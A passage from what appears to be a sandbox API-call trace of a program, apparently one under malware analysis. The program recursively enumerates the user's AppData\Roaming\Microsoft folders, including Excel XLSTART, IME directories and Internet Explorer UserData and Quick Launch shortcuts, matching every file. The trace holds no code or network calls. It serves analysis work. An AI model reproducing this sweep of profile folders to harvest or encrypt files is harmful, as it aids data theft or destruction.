lpFindFileData=0x18d958) returned 1 [0083.415] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel", pszFile="XLSTART" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART" [0083.415] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*" [0083.415] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.415] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.415] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.415] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.415] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.415] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.415] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.415] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="IME12" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IME12") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IME12" [0083.415] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IME12", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IME12\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IME12\\*" [0083.415] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IME12\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.415] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.415] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.415] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.415] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.415] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="IMJP12" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP12") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP12" [0083.415] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP12", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP12\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP12\\*" [0083.415] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP12\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.415] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.415] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.415] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.415] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.415] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="IMJP8_1" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP8_1") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP8_1" [0083.415] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP8_1", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\*" [0083.415] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.415] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.416] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.416] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.416] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.416] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="IMJP9_0" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP9_0") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP9_0" [0083.416] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP9_0", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\*" [0083.416] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.416] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.416] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.416] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.416] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.416] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Internet Explorer" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer" [0083.416] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*" [0083.416] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.416] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.416] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.416] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer", pszFile="Quick Launch" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" [0083.416] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*" [0083.416] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.416] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.416] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.416] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0083.416] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.416] PathMatchSpecW (pszFile="Google Chrome.lnk", pszSpec="*") returned 1 [0083.416] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.416] PathMatchSpecW (pszFile="Launch Internet Explorer Browser.lnk", pszSpec="*") returned 1 [0083.416] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.416] PathMatchSpecW (pszFile="Microsoft Outlook.lnk", pszSpec="*") returned 1 [0083.416] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.416] PathMatchSpecW (pszFile="Shows Desktop.lnk", pszSpec="*") returned 1 [0083.416] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.416] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", pszFile="User Pinned" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" [0083.416] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*" [0083.416] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.416] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.416] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.417] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszFile="ImplicitAppShortcuts" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" [0083.417] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*" [0083.417] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.417] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.417] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.417] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.417] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.417] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszFile="TaskBar" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" [0083.417] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*" [0083.417] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.417] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.417] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.417] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0083.417] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.417] PathMatchSpecW (pszFile="Excel 2016.lnk", pszSpec="*") returned 1 [0083.417] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.417] PathMatchSpecW (pszFile="Google Chrome.lnk", pszSpec="*") returned 1 [0083.417] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.417] PathMatchSpecW (pszFile="Internet Explorer (2).lnk", pszSpec="*") returned 1 [0083.417] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.417] PathMatchSpecW (pszFile="Internet Explorer.lnk", pszSpec="*") returned 1 [0083.417] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.417] PathMatchSpecW (pszFile="Mozilla Firefox.lnk", pszSpec="*") returned 1 [0083.417] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.417] PathMatchSpecW (pszFile="OneNote 2016.lnk", pszSpec="*") returned 1 [0083.417] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.418] PathMatchSpecW (pszFile="Outlook 2016.lnk", pszSpec="*") returned 1 [0083.418] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.418] PathMatchSpecW (pszFile="PowerPoint 2016.lnk", pszSpec="*") returned 1 [0083.418] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.418] PathMatchSpecW (pszFile="Project 2016.lnk", pszSpec="*") returned 1 [0083.418] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.418] PathMatchSpecW (pszFile="Visio 2016.lnk", pszSpec="*") returned 1 [0083.418] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.418] PathMatchSpecW (pszFile="Windows Explorer (2).lnk", pszSpec="*") returned 1 [0083.418] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.418] PathMatchSpecW (pszFile="Windows Explorer.lnk", pszSpec="*") returned 1 [0083.418] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.418] PathMatchSpecW (pszFile="Windows Media Player (2).lnk", pszSpec="*") returned 1 [0083.418] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.418] PathMatchSpecW (pszFile="Windows Media Player.lnk", pszSpec="*") returned 1 [0083.418] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.418] PathMatchSpecW (pszFile="Word 2016.lnk", pszSpec="*") returned 1 [0083.418] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.418] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.418] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.418] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.418] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.418] PathMatchSpecW (pszFile="Window Switcher.lnk", pszSpec="*") returned 1 [0083.418] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.418] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.418] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.418] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer", pszFile="UserData" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData" [0083.418] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*" [0083.418] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.419] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.419] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.419] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData", pszFile="Low" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low" [0083.419] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*" [0083.419] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.419] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.419] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.419] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", pszFile="356BZ594" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\356BZ594") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\356BZ594" [0083.419] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\356BZ594", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\356BZ594\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\356BZ594\\*" [0083.419] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\356BZ594\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.419] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.419] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.419] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.419] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.419] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.419] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.419] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", pszFile="N4CF7XJW" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\N4CF7XJW") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\N4CF7XJW" [0083.419] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\N4CF7XJW", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\N4CF7XJW\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\N4CF7XJW\\*" [0083.419] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\N4CF7XJW\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.419] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.419] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.419] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.419] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.419] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", pszFile="WIK9MYAA" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\WIK9MYAA") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\WIK9MYAA" [0083.419] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\WIK9MYAA", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\WIK9MYAA\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\WIK9MYAA\\*" [0083.419] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\WIK9MYAA\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.419] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.419] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.419] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.419] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.419] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", pszFile="ZE5P2FRT" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\ZE5P2FRT") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\ZE5P2FRT" [0083.420] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\ZE5P2FRT", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\ZE5P2FRT\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\ZE5P2FRT\\*" [0083.420] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\ZE5P2FRT\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.420] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.420] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.420] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.420] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.420] FindClose (in: hFindFile=0x586c20 | out: 